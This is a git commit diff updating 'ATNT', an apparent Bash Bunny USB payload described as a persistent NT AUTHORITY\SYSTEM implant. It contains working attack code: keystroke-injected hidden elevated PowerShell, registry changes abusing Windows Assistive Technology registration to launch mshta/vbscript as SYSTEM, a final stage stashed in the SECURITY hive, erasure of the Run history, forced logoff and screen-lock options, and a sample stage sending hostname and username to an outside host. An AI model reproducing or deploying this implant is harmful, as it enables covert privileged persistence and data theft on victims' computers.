ATNT update: working version (#461)
* Delete stage3.ps1 * Update ATNT to work as intended. Update ATNT to work as intended. Requires reboot or logoff to fully register AT. * Remove DONE file in cleanup. Forgot to remove DONE file. Now also makes sure this file does not exist before running.pull/462/head
parent
4f6cd4b54d
commit
1efd6a1116
|
@ -0,0 +1,18 @@
|
||||||
|
# ATNT : Persistent NT AUTHORITY\SYSTEM implant
|
||||||
|
|
||||||
|
Uses Windows [Ease of Access Assistive Technology](https://docs.microsoft.com/en-us/windows/win32/winauto/ease-of-access---assistive-technology-registration) to persistently run code with NT AUTHORITY\SYSTEM rights.
|
||||||
|
|
||||||
|
## Options
|
||||||
|
### :warning: FORCE_LOGOFF
|
||||||
|
> Ease of Access Assistive Technologies (ATs) are only callable after a restart or logoff. Setting this setting to true will forcefully log the user off. Unsaved work on the target may be lost.
|
||||||
|
### :warning: LOCK_ON_USER
|
||||||
|
> After the AT has been successfully registered (target machine has rebooted or user has been logged off), the AT will be launched when the user first logs in. The AT is ran as User, and thus can not complete its installation. Setting this setting to true will lock the desktop as soon as the user first logs in. This may cause suspicion for the target user, but only happens once.
|
||||||
|
### RUN_IMMEDIATELY
|
||||||
|
> When the AT is first launched as NT AUTHORITY/SYSTEM, the final stage is written to the SECURITY registry hive. Only NT AUTHORITY/SYSTEM has access to this hive. Setting this setting to true will also immediately run the final stage, instead of waiting for a second switch to a Secure Desktop to launch the final stage.
|
||||||
|
|
||||||
|
## final_stage.ps1
|
||||||
|
The final_stage.ps1 file is merged into the second stage. Usage of `@"\n..."@\n` is therefore not possible. Variable definition and usage should be escaped as follows:
|
||||||
|
```powershell
|
||||||
|
`$example = 1;
|
||||||
|
Write-Host `$example;
|
||||||
|
```
|
|
@ -1 +1,2 @@
|
||||||
iwr ('https://example.com/beacon_'+(whoami))
|
<#([WmiClass]'Win32_Process').Create('powershell -NoE -NoP whoami');#>
|
||||||
|
iwr ("example.com/{0}:{1}" -f (hostname),(whoami))
|
|
@ -1,86 +1,75 @@
|
||||||
#!/bin/bash
|
#!/bin/bash
|
||||||
#
|
#
|
||||||
# Title: ATNT : Persistent NT AUTHORITY\SYSTEM implant
|
# Title: ATNT : Persistent NT AUTHORITY\SYSTEM implant
|
||||||
# Description: Uses Windows Ease of Access Assistive Technology (https://docs.microsoft.com/en-us/windows/win32/winauto/ease-of-access---assistive-technology-registration)
|
# Description: Uses Windows Ease of Access Assistive Technology (https://docs.microsoft.com/en-us/windows/win32/winauto/ease-of-access---assistive-technology-registration)
|
||||||
# To persistently run code with NT AUTHORITY\SYSTEM rights.
|
# To persistently run code with NT AUTHORITY\SYSTEM rights.
|
||||||
# Author: 9o3
|
# Author: 9o3
|
||||||
# Twitter: @BugBot4
|
# Twitter: @BugBot4
|
||||||
# Version: 1.0
|
# Version: 1.1
|
||||||
# Category: Execution
|
# Category: Execution
|
||||||
# Attackmodes: HID, Storage
|
# Attackmodes: HID, Storage
|
||||||
#
|
#
|
||||||
# LED STATUS
|
# LED STATUS
|
||||||
# ==========
|
# ==========
|
||||||
# SETUP.......Generate stage files
|
# SETUP.......Generate stage file
|
||||||
# STAGE1......Run hidden elevated PowerShell window that creates the AT
|
# ATTACK......Run hidden elevated PowerShell window that creates the AT and drops associated code
|
||||||
# STAGE2......Trigger the newly created AT
|
# CLEANUP.....Remove generated files
|
||||||
# STAGE3......Update the newly created AT to run the final stage
|
# FINISH......Finished
|
||||||
# STAGE4......(OPTIONAL) Trigger the updated AT to run the final stage
|
#
|
||||||
# CLEANUP.....Remove generated files
|
# OPTIONS
|
||||||
# FINISH......Finished
|
# =======
|
||||||
#
|
# Final stage configured from included final_stage.ps1 script
|
||||||
# OPTIONS
|
# FORCE_LOGOFF => Setting this setting to true will forcefully log the user off. Unsaved work on the target may be lost.
|
||||||
# =======
|
# LOCK_ON_USER => Lock the desktop as soon as the user first logs in. This may cause suspicion for the target user, but only happens once. Doing this starts the AT as NT AUTHORITY/SYSTEM.
|
||||||
# Final stage configured from included final_stage.ps1 script
|
# RUN_IMMEDIATELY => Run the final stage as soon as the AT is ran as NT AUTHORITY/SYSTEM, instead of running it after it has been called from the SECURITY hive.
|
||||||
# run_final_stage => Setting this to false will instead trigger the final stage when the user switches to a Secure Desktop
|
FORCE_LOGOFF=true
|
||||||
run_final_stage=true
|
LOCK_ON_USER=true
|
||||||
|
RUN_IMMEDIATELY=true
|
||||||
LED SETUP
|
|
||||||
GET SWITCH_POSITION
|
######## Generate stage file ########
|
||||||
cd /root/udisk/payloads/
|
# Alter second stage based on settings & merge final stage.ps1 into second stage
|
||||||
cd $SWITCH_POSITION
|
LED SETUP
|
||||||
sed "s/!SWITCH!/$SWITCH_POSITION/g" stage2.ps1 > 2
|
GET SWITCH_POSITION
|
||||||
sed '/!FINAL_STAGE!/{
|
rm /root/udisk/DONE
|
||||||
s/!FINAL_STAGE!//g
|
cd /root/udisk/payloads/$SWITCH_POSITION
|
||||||
r final_stage.ps1
|
if [ "$RUN_IMMEDIATELY" = true ] ; then
|
||||||
}' stage3.ps1 > 3
|
RUN_IMMEDIATELY_TEXT='iex `$p'
|
||||||
|
fi
|
||||||
ATTACKMODE HID STORAGE
|
if [ "$LOCK_ON_USER" = true ] ; then
|
||||||
|
LOCK_ON_USER_TEXT='rundll32.exe user32.dll,LockWorkStation;'
|
||||||
######## Run hidden elevated PowerShell window ########
|
fi
|
||||||
# Runs hidden elevated powershell which executes stage2.ps1
|
if [ "$FORCE_LOGOFF" = true ] ; then
|
||||||
LED STAGE1
|
FORCE_LOGOFF_TEXT='(Get-WmiObject -Class Win32_OperatingSystem).Win32Shutdown(4)'
|
||||||
QUACK GUI r
|
fi
|
||||||
QUACK DELAY 500
|
|
||||||
QUACK STRING "powershell -w 1 -NoP iex(gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\2')-Raw)"
|
sed -e "s/#RI#/$RUN_IMMEDIATELY_TEXT/g" -e "s/<#LI#>/$LOCK_ON_USER_TEXT/g" -e "s/#FL#/$FORCE_LOGOFF_TEXT/g" -e '/!FINAL_STAGE!/{
|
||||||
QUACK DELAY 200
|
s/!FINAL_STAGE!//g
|
||||||
QUACK CTRL-SHIFT ENTER
|
r final_stage.ps1
|
||||||
QUACK DELAY 750
|
}' stage2.ps1 > 2
|
||||||
QUACK LEFTARROW
|
|
||||||
QUACK DELAY 100
|
ATTACKMODE HID STORAGE
|
||||||
QUACK ENTER
|
|
||||||
|
######## Run hidden elevated PowerShell window ########
|
||||||
######## Trigger the newly created AT ########
|
# Runs hidden elevated powershell which executes stage2.ps1
|
||||||
# ATs are tirggered by a desktop switch. Secure Desktops launch ATs as NT AUTHORITY\SYSTEM
|
LED STAGE1
|
||||||
# The AT gets and executes stage3.ps1
|
QUACK GUI r
|
||||||
LED STAGE2
|
QUACK DELAY 500
|
||||||
QUACK DELAY 1000
|
QUACK STRING "powershell -w 1 -NoP iex(gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\2')-Raw)"
|
||||||
QUACK CTRL-ALT DEL
|
QUACK DELAY 200
|
||||||
QUACK DELAY 750
|
QUACK CTRL-SHIFT ENTER
|
||||||
QUACK ESC
|
QUACK DELAY 1200
|
||||||
|
QUACK LEFTARROW
|
||||||
######## Update the newly created AT ########
|
QUACK DELAY 200
|
||||||
# Write the content of final_stage.ps1 to the SECURITY hive, which is only readable as NT AUTHORITY\SYSTEM
|
QUACK ENTER
|
||||||
# Updates the newly created AT to read and execute the final stage from the SECURITY hive
|
until [ -f /root/udisk/DONE ]
|
||||||
LED STAGE3
|
do
|
||||||
until [ -f /root/udisk/DONE ]
|
sleep 0.2
|
||||||
do
|
done
|
||||||
sleep 0.2
|
|
||||||
done
|
######## Remove generated files ########
|
||||||
if [ "$run_final_stage" = true ] ; then
|
# Removes the generated stage file and sync file system
|
||||||
######## Trigger the updated AT ########
|
LED CLEANUP
|
||||||
# Trigger the updated AT as NT AUTHORITY\SYSTEM and execute the final stage
|
rm 2
|
||||||
LED STAGE4
|
rm /root/udisk/DONE
|
||||||
QUACK CTRL-ALT DEL
|
sync
|
||||||
QUACK DELAY 750
|
LED FINISH
|
||||||
QUACK ESC
|
|
||||||
fi
|
|
||||||
|
|
||||||
######## Remove generated files ########
|
|
||||||
# Removes the generated stages and the DONE file used to indicate the end of the third stage
|
|
||||||
LED CLEANUP
|
|
||||||
rm /root/udisk/DONE
|
|
||||||
rm 2
|
|
||||||
rm 3
|
|
||||||
sync
|
|
||||||
LED FINISH
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
#Remove latest run entry
|
#Remove latest run entry
|
||||||
$p = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"; $m = "MRUList"; $l=(gp $p).$m; rp $p $l[0]; sp $p $m $l.Substring(1);
|
$p = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"; $m = "MRUList"; $l=gpv $p $m; rp $p $l[0]; sp $p $m $l.Substring(1);
|
||||||
|
|
||||||
# Create AT to run next stage
|
# Create AT to run next stage
|
||||||
$at = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs"
|
$at = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs"
|
||||||
|
@ -8,7 +8,45 @@ New-Item -Path $at -Name "atnt" -Force
|
||||||
New-ItemProperty -Path $atnt -Name "CopySettingsToLockedDesktop" -Value 1 -PropertyType "DWord" -Force
|
New-ItemProperty -Path $atnt -Name "CopySettingsToLockedDesktop" -Value 1 -PropertyType "DWord" -Force
|
||||||
New-ItemProperty -Path $atnt -Name "SimpleProfile" -Value "atnt" -PropertyType "String" -Force
|
New-ItemProperty -Path $atnt -Name "SimpleProfile" -Value "atnt" -PropertyType "String" -Force
|
||||||
New-ItemProperty -Path $atnt -Name "StartExe" -Value "%SystemRoot%\System32\mshta.exe" -PropertyType "ExpandString" -Force
|
New-ItemProperty -Path $atnt -Name "StartExe" -Value "%SystemRoot%\System32\mshta.exe" -PropertyType "ExpandString" -Force
|
||||||
New-ItemProperty -Path $atnt -Name "StartParams" -Value "vbscript:(CreateObject(""WScript.Shell"").Run(""powershell -w 1 -NoP if((whoami) -ne 'NT AUTHORITY\SYSTEM'){exit};iex(gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\!SWITCH!\3')-Raw)"",0)(Window.Close))" -PropertyType "String" -Force
|
New-ItemProperty -Path $atnt -Name "StartParams" -Value ("vbscript:(CreateObject(""WScript.Shell"").Run(""powershell -w 1 -NoP ([WmiClass]'Win32_Process').Create('powershell -w 1 -NoP iex(gpv HKLM:\SOFTWARE\Microsoft\Windows`` NT\CurrentVersion\Accessibility\ATs\atnt 0)')"",0)(Window.Close))") -PropertyType "String" -Force
|
||||||
|
|
||||||
|
# The value of this is ran when the AT is launched.
|
||||||
|
# If the AT is launched with user privilages, lock the workstation. This trigger the AT to be launched a second time as NT AUTHORITY/SYSTEM.
|
||||||
|
# When launched as NT AUTHORITY/SYSTEM, the next stage is retrieved from the registry and ran.
|
||||||
|
New-ItemProperty -Path $atnt -Name "0" -Value @"
|
||||||
|
if((whoami) -ne 'NT AUTHORITY\SYSTEM'){<#LI#>exit;}
|
||||||
|
iex(gpv HKLM:\SOFTWARE\Microsoft\Windows`` NT\CurrentVersion\Accessibility\ATs\atnt 1)
|
||||||
|
"@
|
||||||
|
|
||||||
|
# The value of this is ran when the AT is launched with NT AUTHORITY/SYSTEM rights.
|
||||||
|
# Uses Set-Alias and short variable names to fit payload in a single registry entry.
|
||||||
|
New-ItemProperty -Path $atnt -Name "1" -Value @"
|
||||||
|
`$a = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\atnt";
|
||||||
|
`$p = gpv `$a 2;
|
||||||
|
sal nip New-ItemProperty;
|
||||||
|
sal rip Remove-ItemProperty;
|
||||||
|
ni -Path "HKLM:\SECURITY\Policy" -Name PolAtnt -Force;
|
||||||
|
nip -Path "HKLM:\SECURITY\Policy\PolAtnt" -Name "1" -Value `$p -PropertyType "string" -Force;
|
||||||
|
nip -Path `$a -Name "StartParams" -Value "vbscript:(CreateObject(""WScript.Shell"").Run(""powershell -w 1 -NoP if((whoami) -ne 'NT AUTHORITY\SYSTEM'){exit};([WmiClass]'Win32_Process').Create('powershell -w 1 -NoP iex(gpv HKLM:\SECURITY\Policy\PolAtnt 1)')"",0)(Window.Close))" -PropertyType "String" -Force;
|
||||||
|
rip -Path `$a -Name "2" -Force;
|
||||||
|
rip -Path `$a -Name "1" -Force;
|
||||||
|
rip -Path `$a -Name "0" -Force;
|
||||||
|
#RI#
|
||||||
|
"@
|
||||||
|
|
||||||
|
# The final stage is later written to the SECURITY hive, this hive is only visible by NT AUTHORITY/SYSTEM.
|
||||||
|
New-ItemProperty -Path $atnt -Name "2" -Value @"
|
||||||
|
!FINAL_STAGE!
|
||||||
|
|
||||||
|
"@
|
||||||
|
|
||||||
|
|
||||||
#Add the newly created AT to automatically start on a desktop switch.
|
#Add the newly created AT to automatically start on a desktop switch.
|
||||||
New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility" -Name "Configuration" -Value "atnt" -PropertyType "String" -Force
|
New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility" -Name "Configuration" -Value "atnt" -PropertyType "String" -Force;
|
||||||
|
|
||||||
|
#Let the Bash Bunny know we're done here & Eject.
|
||||||
|
$bb = (gwmi win32_volume -f 'label=''BashBunny''').Name;
|
||||||
|
New-Item -ItemType file $bb"DONE";
|
||||||
|
(New-Object -comObject Shell.Application).Namespace(17).ParseName($bb).InvokeVerb("Eject");
|
||||||
|
|
||||||
|
#FL#
|
||||||
|
|
|
@ -1,14 +0,0 @@
|
||||||
$payload = @"
|
|
||||||
!FINAL_STAGE!
|
|
||||||
"@
|
|
||||||
|
|
||||||
New-Item -Path "HKLM:\SECURITY\Policy" -Name "PolAtnt" -Force
|
|
||||||
New-ItemProperty -Path "HKLM:\SECURITY\Policy\PolAtnt" -Name "1" -Value $payload -PropertyType "string" -Force
|
|
||||||
|
|
||||||
# The final stage is ran in a new orphaned PowerShell process to prevent it from closing when the Secure Desktop closes.
|
|
||||||
New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\atnt" -Name "StartParams" -Value "vbscript:(CreateObject(""WScript.Shell"").Run(""powershell -w 1 -NoP if((whoami) -ne 'NT AUTHORITY\SYSTEM'){exit};([WmiClass]'Win32_Process').Create('powershell -w 1 -NoP iex(gpv HKLM:\SECURITY\Policy\PolAtnt 1)')"",0)(Window.Close))" -PropertyType "String" -Force
|
|
||||||
|
|
||||||
#Let the Bash Bunny know we're done here & Eject.
|
|
||||||
$bb = (gwmi win32_volume -f 'label=''BashBunny''').Name;
|
|
||||||
New-Item -ItemType file $bb"DONE";
|
|
||||||
(New-Object -comObject Shell.Application).Namespace(17).ParseName($bb).InvokeVerb("Eject");
|
|
Loading…
Reference in New Issue